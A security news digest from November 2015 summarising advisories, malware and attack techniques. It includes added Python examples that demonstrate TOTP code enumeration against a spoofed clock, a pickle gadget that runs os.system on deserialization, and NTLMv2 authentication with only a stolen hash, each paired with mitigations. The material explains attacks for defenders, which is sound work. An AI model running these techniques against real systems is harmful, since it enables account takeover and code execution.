Security researcher Gabor Szathmari says the problem is that if your 2FA tokens depend on the network time protocol (NTP), it's too easy for a sysadmin to put together an attackable implementation. As he explains in two posts..., if an attacker can trick NTP, they can mount a brute-force attack against the security tokens produced by Google Authenticator (the example in the POC) and a bunch of other Time-based One-time Password Algorithm-based (TOTP) 2FA mechanisms.
---------------------------------------------
http://www.theregister.co.uk/2015/11/12/got_a_time_machine_good_you_can_bru…
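Added example (not from the Register article or from Szathmari's posts): an RFC 6238 TOTP implementation with a verifier whose time source is injectable, plus the attacker's guessing loop, to make concrete why the clock matters. The verifier, the guessing loop and the frozen-clock scenario are this example's own constructions; the secret is the RFC 6238 test-vector key, so the codes can be checked against the RFC's Appendix B values.

```python
import hashlib
import hmac
import struct
from typing import Callable

STEP = 30      # RFC 6238 default time step (seconds)
DIGITS = 6


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, digits: int = DIGITS) -> str:
    """RFC 6238: HOTP with the counter derived from the clock, i.e. from whatever NTP says."""
    return hotp(secret, unix_time // STEP, digits)


class TotpVerifier:
    """Server side. `clock` is the time source; `window` is how many adjacent
    time steps are accepted to tolerate client/server drift."""

    def __init__(self, secret: bytes, clock: Callable[[], int], window: int = 1):
        self.secret, self.clock, self.window = secret, clock, window
        self._cache = (None, frozenset())   # (time step, codes valid in that step)

    def valid_codes(self) -> frozenset:
        step = self.clock() // STEP
        if self._cache[0] != step:
            codes = frozenset(hotp(self.secret, step + d)
                              for d in range(-self.window, self.window + 1))
            self._cache = (step, codes)
        return self._cache[1]

    def verify(self, code: str) -> bool:
        return code in self.valid_codes()


def online_guess(verifier: TotpVerifier, max_attempts: int = 10 ** DIGITS):
    """Attacker: submit codes in order until one is accepted. Returns (code, attempts).
    Against a live clock the accepted set rotates every STEP seconds and earlier
    rejections carry no information; against a frozen clock the accepted set is
    fixed, so this loop is guaranteed to succeed within 10**DIGITS attempts."""
    for n in range(max_attempts):
        code = str(n).zfill(DIGITS)
        if verifier.verify(code):
            return code, n + 1
    return None, max_attempts


SECRET = b"12345678901234567890"   # RFC 6238 test-vector key for the SHA-1 variant

if __name__ == "__main__":
    # Clock pinned at a fixed instant: what a spoofed NTP source achieves on the server.
    frozen = TotpVerifier(SECRET, clock=lambda: 59, window=0)
    print(online_guess(frozen))   # ('287082', 287083)
```

With the server's clock pinned, the accepted code set never rotates, so ordered enumeration hits the code on the 287,083rd guess here and within 10^6 guesses in every case; with a live clock each guess has only (2·window+1)/10^6 odds and nothing learned in one 30-second step carries over to the next. Either way the precondition is a verifier that accepts unlimited attempts, so throttling or locking the account after a handful of failed codes is the fix that does not depend on trusting NTP.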
*** Spam and phishing in Q3 2015 ***
---------------------------------------------
The dating theme is typical for spam emails, but in the third quarter of 2015 we couldn't help but notice the sheer variety appearing in these types of mailings. We came across some rather interesting attempts to deceive recipients and to bypass filters, as well as new types of spam mailings that were bordering on fraud.
---------------------------------------------
https://securelist.com/analysis/quarterly-spam-reports/72724/spam-and-phish…
*** Oracle WebLogic Server: CVE-2015-4852 patched, (Thu, Nov 12th) ***
---------------------------------------------
Lost in the hoopla around Microsoft and Adobe patch Tuesday was a critical patch released by Oracle which addressed CVE-2015-4852. CVE-2015-4852 is a critical vulnerability in Apache Commons which affects Oracle WebLogic Server. This vulnerability permits remote exploitation without authentication and should be patched as soon as practical. More information can be found at the Oracle Blog. -- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ -...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20369&rss
*** Cisco Cloud Web Security DNS Hijack, (Thu, Nov 12th) ***
---------------------------------------------
We have received a report that a domain critical in delivering the Cisco Cloud Web Security product had for a while earlier today been hijacked. The report indicates that the DNS entries for scansafe.net were hijacked and pointed to 208.91.197.132, a site which both VirusTotal and Web of Trust indicate has a reputation for delivering malware. Guidance that has been provided to customers is that the issue has been resolved but that the TTL on the DNS entries is 48 hours so it will take a...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20371&rss
*** Volatility 2.5 released ***
---------------------------------------------
This is the first release since the publication of The Art of Memory Forensics! It adds support for Windows 10 (initial), Linux kernels 4.2.3, and Mac OS X El Capitan. Additionally, the unified output rendering gives users the flexibility of asking for results in various formats (html, sqlite, json, xlsx, dot, text, etc.) while simplifying things for plugin developers. In short, less code...
---------------------------------------------
http://www.volatilityfoundation.org/?_escaped_fragment_=25/c1f29
*** The Apache Software Foundation on the Java Commons Collections / Java (de)serialization problem ***
---------------------------------------------
The Apache Software Foundation has written a detailed blog post on this (12 November 2015). The money quote from it: "Even when the classes implementing a certain functionality cannot be blamed for this vulnerability, and fixing the known cases will also not make the usage of serialization in an untrusted context safe, there is still demand to fix at least the known cases, even when this...
---------------------------------------------
http://www.cert.at/services/blog/20151112140918-1625.html
*** R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities ***
---------------------------------------------
The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. A stored cross-site scripting vulnerability was also discovered. The issue is triggered when input passed via multiple POST parameters is not properly sanitized before being returned to the user. This can be exploited to execute...
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php
*** Cisco FireSight Management Center Web Framework Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Google Picasa CAMF Section Integer Overflow Vulnerability ***
---------------------------------------------
Severity rating: Highly critical. Impact: System access. Where: From remote. ... Solution: Update to version 3.9.140 Build 259.
---------------------------------------------
http://www.securityfocus.com/archive/1/536878
*** Citrix XenServer Security Update for CVE-2015-5307 and CVE-2015-8104 ***
---------------------------------------------
A security vulnerability has been identified in Citrix XenServer that may allow a malicious administrator of an HVM guest VM to crash the host. This vulnerability affects all currently supported versions of Citrix XenServer up to and including Citrix XenServer 6.5 Service Pack 1.
---------------------------------------------
http://support.citrix.com/article/CTX202583
*** Security Notice - Statement on Security Researchers Revealing a Security Vulnerability in Huawei HG630a&HG630a-50 on Packet Storm Website ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 10-11-2015 18:00 − Mittwoch 11-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** November 2015 Security Update Release Summary ***
---------------------------------------------
Today we released security updates to provide protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released. More information about this month's security updates and advisories can be found in the Security TechNet Library. MSRC Team
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2015/11/10/november-2015-security-u…
*** MSRT November 2015: Detection updates ***
---------------------------------------------
The Microsoft Malicious Software Removal Tool (MSRT) is updated monthly with new malware detections - so far this year we have added 29 malware families. This month we are updating our detections for some of the malware families already included in the tool. We choose the malware families we add to the MSRT each month using several criteria. One of the most common reasons is the prevalence of a family in the malware ecosystem. For example, in recent months we focused on...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2015/11/10/msrt-november-2015-detec…
*** Patch day: Adobe treats the Flash patient ***
---------------------------------------------
Flash is on the operating table again and being patched. Users should treat their Flash patient promptly, as the vulnerabilities are rated critical. Exploits are reportedly not yet in circulation.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Patchday-Adobe-pflegt-den-Flash-Pati…
*** What You Should Know about Triangulation Fraud and eBay ***
---------------------------------------------
The increasing phenomenon of triangulation fraud on eBay has led to a published analysis on behalf of the company, as to how buyers should get informed and what they should pay attention to. Over the past few months, a new phenomenon has risen and its proportions have been growing exponentially. It seems that, even if...
---------------------------------------------
http://securityaffairs.co/wordpress/41891/cyber-crime/triangulation-fraud-a…
*** Symantec Endpoint Protection: old vulnerability reopens ***
---------------------------------------------
A vulnerability thought dead is back, because an older patch addressed only parts of the problem. The current update for Symantec's Endpoint Protection is meant to fix it now and to close further vulnerabilities as well.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Symantec-Endpoint-Protection-Alte-Si…
*** What Happens to Hacked Social Media Accounts ***
---------------------------------------------
This article is going to look at a few reasons why a social media account is hacked. The goal is for you to understand why you will want to better protect your account, regardless of whether or not you see yourself as "important".
---------------------------------------------
http://www.tripwire.com/state-of-security/security-awareness/what-happens-t…
*** InstaAgent: password-harvesting Instagram client thrown out of the App Store and Google Play ***
---------------------------------------------
The app, which promises users various additional information about their profile on Facebook's popular photo service, apparently sent Instagram usernames and passwords in plaintext to a third-party server.
---------------------------------------------
http://heise.de/-2917792
*** GasPot Integrated Into Conpot, Contributing to Open Source ICS Research ***
---------------------------------------------
In August of this year, we presented at Blackhat our paper titled The GasPot Experiment: Unexamined Perils in Using Gas-Tank-Monitoring Systems. GasPot was a honeypot designed to mimic the behavior of the Guardian AST gas-tank-monitoring system. It was designed to look like no other existing honeypot, with each instance being unique to make fingerprinting by attackers impossible. These were deployed within networks located in various countries, to give us a complete picture of the attacks...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/4jNwbTj60bk/
*** Questions are the answers - How to avoid becoming the blamed victim ***
---------------------------------------------
"You have to ask questions", I say. Questions before, during, and after a breach. If you ask the right questions at the right time, you'll be able to make better decisions than the knee-jerk ones you've been making.
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/questions-are-the-answ…
*** TA15-314A: Web Shells - Threat Awareness and Guidance ***
---------------------------------------------
Original release date: November 10, 2015. Systems Affected: Web servers that allow web shells. Overview: This alert describes the frequent use of web shells as an exploitation vector. Web shells can be used to obtain unauthorized access and can lead to wider network compromise. This alert outlines the threat and provides prevention, detection, and mitigation strategies. Consistent use of web shells by Advanced Persistent Threat (APT) and criminal groups has led to significant cyber incidents. This...
---------------------------------------------
https://www.us-cert.gov/ncas/alerts/TA15-313A
*** Bugtraq: [security bulletin] HPSBGN03507 rev.2 - HP Arcsight Management Center, Arcsight Logger, Remote Cross-Site Scripting (XSS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/536877
*** Huawei HG630a / HG630a-50 Default SSH Admin Password ***
---------------------------------------------
Topic: Huawei HG630a / HG630a-50 Default SSH Admin Password. Risk: High. Text: # Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems # Date: 10.11.2015 # Exploit Author: M...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110087
*** Huawei Security Advisories ***
---------------------------------------------
*** Security Advisory - Input Validation Vulnerability in Huawei VP9660 Products ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - Directory Traversal Vulnerability in Huawei AR Router ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - DoS Vulnerability in Huawei U2990 and U2980 ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - DoS Vulnerability in Huawei eSpace 8950 IP Phone ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - DoS Vulnerability in Huawei eSpace 7900 IP Phone ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** ZDI-15-549: AlienVault Unified Security Management av-forward Deserialization of Untrusted Data Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Unified Security Management. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/eDK-If3dTI8/
*** ZDI-15-548: AlienVault Unified Security Management Local Privilege Escalation Vulnerability ***
---------------------------------------------
This vulnerability allows local attackers to escalate privileges to root on vulnerable installations of AlienVault Unified Security Management. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/TpChWMSd5n0/
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: IBM FileNet eForms is affected by vulnerabilities in Apache HttpComponents(CVE-2012-6153 and CVE-2014-3577) ***
http://www.ibm.com/support/docview.wss?uid=swg21962659
---------------------------------------------
*** IBM Security Bulletin: IBM Forms Server could be affected by a denial of service attack (CVE-2013-4517) ***
http://www.ibm.com/support/docview.wss?uid=swg21962659
---------------------------------------------
*** IBM Security Bulletin: Fix Available for Denial of Service Vulnerability in IBM WebSphere Portal (CVE-2015-7419) ***
http://www.ibm.com/support/docview.wss?uid=swg21969906
---------------------------------------------
*** IBM Security Bulletin: Additional Password Disclosure via application tracing in FlashCopy Manager on Windows, Data Protection for Exchange, and Data Protection for SQL CVE-2015-7404 ***
http://www.ibm.com/support/docview.wss?uid=swg21969514
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in libuser affect Power Hardware Management Console (CVE-2015-3245 CVE-2015-3246) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1020961
---------------------------------------------
*** IBM Security Bulletin: IBM Cúram Social Program Management is vulnerable to a SQL injection attack ***
http://www.ibm.com/support/docview.wss?uid=swg21967851
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Content Collector and IBM CommonStore for Lotus Domino (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21969654
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM WebSphere MQ ***
http://www.ibm.com/support/docview.wss?uid=swg21970103
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Diffie-Hellman ciphers affects IBM Expeditor (CVE-2015-4000) ***
http://www.ibm.com/support/docview.wss?uid=swg21959292
---------------------------------------------
*** Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director Storage Control ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5098822
---------------------------------------------
*** IBM Security Bulletin: IBM FileNet eForms is affected by vulnerabilities in Apache HttpComponents(CVE-2012-6153 and CVE-2014-3577) ***
http://www.ibm.com/support/docview.wss?uid=swg21970090
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 09-11-2015 18:00 − Dienstag 10-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** The Internet of Bad Things, Observed ***
---------------------------------------------
In his VB2015 keynote address, Ross Anderson described attacks against EMV cards. The VB2015 opening keynote by Ross Anderson could hardly have been more timely. In his talk "The Internet of Bad Things, Observed", the Cambridge professor looked at various attacks against the EMV standard for payment cards - attacks that have been used to steal real money from real people. Such cards, often called chip-and-PIN or chip-and-signature, are generally seen as better protected against...
---------------------------------------------
http://www.virusbtn.com/blog/2015/11_10.xml?rss
*** Linux.Encoder.1: ransomware attacks Magento users ***
---------------------------------------------
Linux malware is currently encrypting the data of users of the Magento shop system. The victims are supposed to pay for decryption, but the attackers were sloppy: the encryption can be cracked.
---------------------------------------------
http://www.golem.de/news/linux-encoder-1-ransomware-greift-magento-nutzer-a…
*** Comodo fixes bug, revokes banned certificates ***
---------------------------------------------
After reporting last week that it had issued banned certificates that could facilitate man in the middle (MitM) attacks, Comodo has fixed the "subtle bug" that the company's Senior Research and Development Scientist Rob Stradling wrote prompted the problem.
---------------------------------------------
http://www.scmagazine.com/comodo-fixes-bug-revokes-banned-certificates/arti…
*** Proof-of-concept threat is reminder OS X is not immune to crypto ransomware ***
---------------------------------------------
Symantec analysis confirms that in the wrong hands, Mabouia ransomware could be used to attack Macs. Analysis by Symantec has confirmed that the proof-of-concept (PoC) threat known as Mabouia works as described and could be used to create functional OS X crypto ransomware if it fell into the wrong hands...
---------------------------------------------
http://www.symantec.com/connect/blogs/proof-concept-threat-reminder-os-x-no…
*** Protecting Users and Enterprises from the Mobile Malware Threat, (Mon, Nov 9th) ***
---------------------------------------------
With recent news of mobile malicious adware that roots smartphones, attention is again being paid to mobile security and the malware threat that is posed to it. While mobile ransomware is also a pervasive and growing threat, there are mobile RATs (such as JSocket and OmniRAT) that are also able to take full remote control of mobile devices. Some of the functionality of those tools includes the ability to use the microphone to listen in on victims and to view whatever is in front of the camera...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20355&rss
*** Cisco Connected Grid Network Management System Privilege Escalation Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Citrix XenServer Security Update for CVE-2015-5307 and CVE-2015-8104 ***
---------------------------------------------
A security vulnerability has been identified in Citrix XenServer that may allow a malicious administrator of an HVM guest VM to crash the host. ...
---------------------------------------------
http://support.citrix.com/article/CTX202583
*** PowerDNS Security Advisory 2015-03: Packet parsing bug can lead to crashes ***
---------------------------------------------
A bug was found using afl-fuzz in our packet parsing code. This bug, when exploited, causes an assertion error and consequent termination of the pdns_server process, causing a Denial of Service. ... PowerDNS Authoritative Server 3.4.4 - 3.4.6 are affected. No other versions are affected. The PowerDNS Recursor is not affected.
---------------------------------------------
https://doc.powerdns.com/md/security/powerdns-advisory-2015-03/
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 06-11-2015 18:00 − Montag 09-11-2015 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** ICYMI: Widespread Unserialize Vulnerability in Java, (Mon, Nov 9th) ***
---------------------------------------------
On Friday, a blog post from Fox Glove Security was posted that details a widespread Java unserialize vulnerability that affects all the major flavors of middleware (WebSphere, WebLogic, et al). There are a lot of great details, including exploitation instructions for pentesters, in the post so go take a look. It didn't get much press because admittedly it's complicated to explain. It also doesn't have a logo.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20353&rss
*** SSH client PuTTY 0.66 closes security hole ***
---------------------------------------------
The new version of the SSH and Telnet client brings a few small improvements and bug fixes. A security vulnerability has also been closed.
---------------------------------------------
http://www.heise.de/newsticker/meldung/SSH-Client-PuTTY-0-66-schliesst-Sich…
*** Free Wi-Fi: what the risks are and how to protect yourself ***
---------------------------------------------
A public network is convenient, but users should not log in blindly.
---------------------------------------------
http://derstandard.at/2000025293625
*** Guide to application whitelisting ***
---------------------------------------------
The National Institute of Standards and Technology (NIST) has published a guide to deploying automated application whitelisting to help thwart malicious software from gaining access to organizations' computer systems.
---------------------------------------------
http://www.net-security.org/secworld.php?id=19079
*** Dangerous bugs leave open doors to SAP HANA systems ***
---------------------------------------------
The most serious software flaws ever have been found in SAP's HANA platform, the in-memory database platform that underpins many of the German company's products used by large companies. Eight of the flaws are ranked critical, the highest severity rating ...
---------------------------------------------
http://www.cio.com/article/3003054/dangerous-bugs-leave-open-doors-to-sap-h…
*** Vbulletin 5.1.X Unserialize Preauth RCE Exploit ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110060
*** Ransomware meets CMS / Linux ***
---------------------------------------------
Ransomware on PCs has been around for years: the malware locks/encrypts the infected PC and demands a ransom so that the user can continue working. That poorly maintained websites running Joomla, WordPress, Drupal & co. are easy prey for hackers is nothing new either. We regularly see waves of defacements and exploit packs whenever someone automates the exploitation of a web vulnerability.
---------------------------------------------
http://www.cert.at/services/blog/20151109095947-1618.html
*** Google AdWords API client libraries - XML eXternal Entity Injection (XXE) ***
---------------------------------------------
Confirmed in googleads-php-lib <= 6.2.0 for PHP, AdWords libraries: googleads-java-lib for Java, and googleads-dotnet-lib for .NET are also likely to be affected.
---------------------------------------------
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injecti…
*** Closing the Open Door of Java Object Serialization ***
---------------------------------------------
If you can communicate with a JVM using Java object serialization using java.io.ObjectInputStream, then you can send a class that can execute commands against the OS from inside of the readObject method, and thereby get shell access. Once you have shell access, you can modify the Java server however you feel like. This is a class of exploit called 'deserialization of untrusted data', aka CWE-502. It's a class of bug that has been encountered in Python, PHP, and Rails.
---------------------------------------------
https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-se…
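The same open door in Python's pickle, as an added example (not code from the tersesystems post or from any of the Java projects it names): a gadget whose __reduce__ hands the loader a callable, the vulnerable pickle.loads, and the allow-listing Unpickler subclass that the Python documentation recommends as the fix. The Gadget class, the allowed-globals set and the sample objects are this example's own; the Java counterpart of RestrictedUnpickler.find_class is an ObjectInputStream subclass that rejects unknown classes in resolveClass().

```python
import io
import os
import pickle


class Gadget:
    """Looks harmless, but pickle serialises the (callable, args) pair returned by
    __reduce__ and the loader calls it. Any importable callable works as a gadget."""

    def __reduce__(self):
        return (os.system, ("echo gadget executed during deserialization",))


# Attacker-supplied bytes: building them runs nothing; loading them runs os.system().
PAYLOAD = pickle.dumps(Gadget())


def vulnerable_loads(data: bytes):
    """CWE-502: pickle.loads on untrusted input resolves and calls arbitrary globals."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list approach from the Python docs: find_class() decides which globals
    the stream may reference; everything else is refused before it is resolved."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_roundtrip(obj):
    """Plain data (dicts, lists, strings, numbers, sets) survives the allow-list."""
    return safe_loads(pickle.dumps(obj))


def tries_to_load(data: bytes) -> str:
    """Describe what the hardened loader does with `data`, without raising."""
    try:
        safe_loads(data)
        return "accepted"
    except pickle.UnpicklingError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(tries_to_load(pickle.dumps({"user": "alice", "roles": ["admin"]})))  # accepted
    print(tries_to_load(PAYLOAD))   # rejected: os.system is pickled as posix.system on Linux
    vulnerable_loads(PAYLOAD)       # runs the echo command
```

The allow-list is the only part that matters: any loader that resolves class names from the byte stream before deciding whether to trust them, whether pickle, ObjectInputStream or PHP's unserialize, gives the sender the same call-anything primitive, and blocking one known gadget class (as the Commons Collections fix does) leaves the next one reachable.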
*** Protecting Windows Networks - Defeating Pass-the-Hash ***
---------------------------------------------
Pass-the-hash is a popular attack technique to move laterally inside the network that relies on two components - the NTLM authentication protocol and the ability to gain password hashes. This attack allows you to log in on the systems via a stolen hash instead of providing the clear text password, so there is no need to crack those hashes. To make use of this attack, the attacker already has to have admin rights on the box, which is a plausible scenario in a modern "assume breach" mindset.
---------------------------------------------
https://dfirblog.wordpress.com/2015/11/08/protecting-windows-networks-defea…
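Why the hash alone is enough, as an added example (not from the dfirblog post): the NTLMv2 computation from MS-NLMP, written from both the client's and the verifier's point of view, with every value derived from the NT hash and none from the password. The user, domain, challenges, timestamp and AV_PAIR target info are constructed for the example; NT_HASH is the widely published NT hash of the password "password". Any defence has to start from this: if the hash is the credential, the work is keeping it out of memory on hosts an attacker can reach.

```python
import hashlib
import hmac
import struct


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: keyed on the NT hash itself, so the password is never needed."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure the client authenticates: version bytes, reserved,
    FILETIME, client nonce, reserved, the server's AV_PAIR target info, reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash, user, domain, server_challenge, timestamp, client_challenge, target_info):
    """Client side: NtChallengeResponse = NTProofStr || temp. Only nt_hash is needed."""
    temp = ntlmv2_blob(timestamp, client_challenge, target_info)
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def verify_ntlmv2(nt_hash, user, domain, server_challenge, response) -> bool:
    """Server/DC side: recompute NTProofStr from the stored NT hash and compare.
    Both sides derive everything from nt_hash, so whoever holds the hash can
    answer any challenge for this account without ever learning the password."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


# Sample values, constructed for this example (NT_HASH is the well-known NT hash of
# "password"; in an attack it would come from LSASS memory or a SAM/NTDS dump).
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")
# AV_PAIR list: MsvAvNbDomainName(2) len 8 "CORP" in UTF-16LE, then MsvAvEOL.
TARGET_INFO = b"\x02\x00\x08\x00" + "CORP".encode("utf-16-le") + b"\x00\x00\x00\x00"
TIMESTAMP = 130915188000000000   # FILETIME: 100-ns intervals since 1601-01-01


def demo() -> bool:
    """Attacker with only NT_HASH answers the server's challenge and is accepted."""
    resp = ntlmv2_response(NT_HASH, "alice", "CORP", SERVER_CHALLENGE,
                           TIMESTAMP, CLIENT_CHALLENGE, TARGET_INFO)
    return verify_ntlmv2(NT_HASH, "alice", "CORP", SERVER_CHALLENGE, resp)


if __name__ == "__main__":
    print("accepted" if demo() else "rejected")   # accepted
```

Note that nothing in the exchange changes if the client is an attacker's tool rather than Windows: the server cannot tell a hash-only client from a password-holding one. That is why mitigations target the other component the post names, the harvesting of hashes: no privileged logons to untrusted hosts, unique local administrator passwords, the Protected Users group and Credential Guard where available, and restricting NTLM in favour of Kerberos.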
*** Security Notice - Statement about Path Traversal Vulnerability in Huawei HG532 Routers Disclosed by CERT/CC ***
---------------------------------------------
It is confirmed that some customized versions of Huawei HG532, HG532e, HG532n, and HG532s have this vulnerability. Huawei has prepared a fixed version for affected carriers and is working with them to release the fixed version.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** No surprise here: Adobe's Flash is a hackers' favorite target ***
---------------------------------------------
Adobe Systems' Flash plugin gets no love from anyone in the security field these days. A new study released Monday shows just how much it is favored by cybercriminals to sneak their malware onto computers.
---------------------------------------------
http://www.cio.com/article/3002668/no-surprise-here-adobes-flash-is-a-hacke…
*** Joomla CMS - Bad Cryptography - Multiple Vulnerabilities ***
---------------------------------------------
Here's a complete enumeration of what I've found:
- JCrypt: Silent fallback to a weak, userspace PRNG (which is very bad for cryptography purposes)
- JCryptCipherSimple: Homegrown weak cipher (XOR-ECB)
- JCryptCipher: Chosen ciphertext attacks (no authentication)
- JCryptCipher: Data corruption / padding oracle attack
- JCryptCipher: Static IV for CBC mode (stored with JCryptKey under the misnomer property, "public") -- this sort of defeats the purpose of using CBC mode
- JCryptPasswordSimple: PHP Non-Strict Type Comparison (a.k.a. Magic Hash vulnerability)
---------------------------------------------
http://www.openwall.com/lists/oss-security/2015/11/08/1
*** HTTP Evasions Explained - Part 7 - Lucky Numbers ***
---------------------------------------------
This is part seven in a series which will explain the evasions done by HTTP Evader. This part will be about using the wrong or even invalid status codes to evade the analysis. For 30% of the firewalls in the test reports I've got, it is enough to use a status code of 100 instead of 200 to bypass analysis, and at least Chrome, IE and Edge will download the data even with this wrong status code:
---------------------------------------------
http://noxxi.de/research/http-evader-explained-7-lucky-number.html
*** Security Advisory: Linux kernel vulnerability CVE-2014-9419 ***
---------------------------------------------
F5 Product Development has assigned ID 530413 (BIG-IP), ID 530553 (BIG-IQ), ID 530554 (Enterprise Manager), ID 520651 (FirePass), ID 461496 (ARX), and INSTALLER-1299 (Traffix) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/17000/500/sol17551.htm…
*** IBM Security Bulletins ***
---------------------------------------------
*** Vulnerabilities in Qemu affect PowerKVM (Multiple Vulnerabilities) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022875
---------------------------------------------
*** IBM Smart Analytics System 5600 is affected by vulnerabilities in IBM GPFS (CVE-2015-4974, CVE-2015-4981) ***
http://www.ibm.com/support/docview.wss?uid=swg21969198
---------------------------------------------
*** Authentication Bypass vulnerability found in IBM Sterling B2B Integrator (CVE-2015-5019) ***
http://www.ibm.com/support/docview.wss?uid=swg21967781
---------------------------------------------
*** IBM Smart Analytics System 5600 is affected by a vulnerability in BIND (CVE-2015-5722) ***
http://www.ibm.com/support/docview.wss?uid=swg21964962
---------------------------------------------
*** Vulnerability in Net-SNMP affects PowerKVM (CVE-2015-5621) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022903
---------------------------------------------
*** Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management, and IBM Emptoris Services Procurement. ***
http://www.ibm.com/support/docview.wss?uid=swg21969875
---------------------------------------------
*** Multiple OpenSSL Vulnerabilities affect IBM WebSphere MQ 5.3 on HP NonStop (CVE-2015-1788) (CVE-2015-1789) (CVE-2015-1791) ***
http://www.ibm.com/support/docview.wss?uid=swg21966723
---------------------------------------------
*** Multiple vulnerabilities in IBM Java Runtime affect Security Directory Integrator ***
https://www-304.ibm.com/support/docview.wss?uid=swg21969901
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 05-11-2015 18:00 − Freitag 06-11-2015 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** jQuery.min.php Malware Affects Thousands of Websites ***
---------------------------------------------
Fake jQuery injections have been popular among hackers since jQuery itself went mainstream and became one of the most widely adopted JavaScript libraries. Every now and then we write about such attacks. Almost every week we see new fake jQuery domains and scripts that mimic jQuery.
